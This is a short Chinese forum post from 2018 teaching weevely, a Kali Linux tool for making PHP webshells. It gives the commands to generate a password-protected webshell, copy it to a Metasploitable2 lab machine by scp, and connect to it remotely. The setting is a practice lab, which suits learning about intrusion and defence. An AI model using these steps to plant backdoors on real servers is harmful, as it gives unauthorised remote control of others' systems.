|
weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。 准备环境:- kali linux
- Metasploitables2
首先还是先制作一个 webshell ,密码为 bbskali - weevely generate bbskali secist.php
可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。 我们使用 cat 命令简单查看下 webshell 的内容: - cat /usr/share/weevely/secist.php
现在我将生成的 webshell 远程拷贝到目标机器上: - scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin
或者上传PHP木马 连接一句话木马- weevely http://192.168.30.128/secist.php secist
原文链接:传送门
| 
发表于 2018-5-4 15:22:23
